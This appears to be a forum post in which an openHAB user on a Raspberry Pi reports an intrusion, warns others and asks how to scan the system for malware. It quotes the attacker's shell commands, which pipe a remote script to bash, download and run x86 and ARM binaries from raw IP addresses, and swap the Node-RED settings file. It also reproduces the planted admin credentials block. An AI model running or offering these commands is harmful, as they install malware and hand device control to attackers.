Hello Together,
this is just for Information, my question is at the end…
Yesterday my openhab server, running on RasPi4 was attacked by someone unknown and they managed to run some commands as sudo, this happens between 20h and 00h:
curl http://45.80.153.168:26/ip2.sh | bash
apt update -y; apt install curl cron nano -y; service cron start; uname -a
sudo apt update -y; sudo apt install curl cron nano -y; sudo service cron start; uname -a
cd /tmp; curl -o php http://185.28.39.15/x-8.6-.ISIS; chmod +x php; ./php; rm -rf php
cd /tmp; curl -o php http://185.28.39.15/a-r.m-6.ISIS; chmod +x php; ./php; rm -rf php
cd ~/.node-red; mv settings.js test.js; curl -o settings.js http://185.28.39.15/nodered.txt
pkill node-red | node-red
I have no idea how they managed to come in, this is something I still try to figure out, for now I closed all ports on my router and now I want to find out what was damaged.
First of all, they downloaded an script file, and they run it, no idea what was inside as it is not available anymore, then they run two files, one for x86 and one for arm, it could be that the arm-file was run through. They are still available.
Infos about that arm file are here: Automated Malware Analysis Report for a-r.m-6.ISIS - Generated by Joe Sandbox
No Idea what that was doing, maybe I was involved in some kind of DDoS Attack. I also checked entries for crontab, for openhabian and for root, no entries there, no idea why they installed cron. And they exchanged my node-red settings, they changed that lines here:
...
adminAuth: {
type: "credentials",
users: [
{
username: "admin",
password: "$2b$08$O8/aEWlLrdbCkA1hAsnmZe84m3HuXNf5Qpk5W2JtcP9KAeKyb98LO",
permissions: "*"
},
{
username: "george",
password: "$2b$08$O8/aEWlLrdbCkA1hAsnmZe84m3HuXNf5Qpk5W2JtcP9KAeKyb98LO",
permissions: "read"
}
]
},
...
httpNodeAuth: {user:"user",pass:"$2b$08$O8/aEWlLrdbCkA1hAsnmZe84m3HuXNf5Qpk5W2JtcP9KAeKyb98LO"},
httpStaticAuth: {user:"user",pass:"$2b$08$O8/aEWlLrdbCkA1hAsnmZe84m3HuXNf5Qpk5W2JtcP9KAeKyb98LO"},
...
After that my existing flows were unreadable, I had to undo the changes and re-import the backuped flows again.
So just for your information, check all your open ports and create backups…
My next question is: Is it possible to run an AV-Scan in OpenHab System? How can I do this? I want to go for sure that there is no other files kept from that operation…
Greetings Jack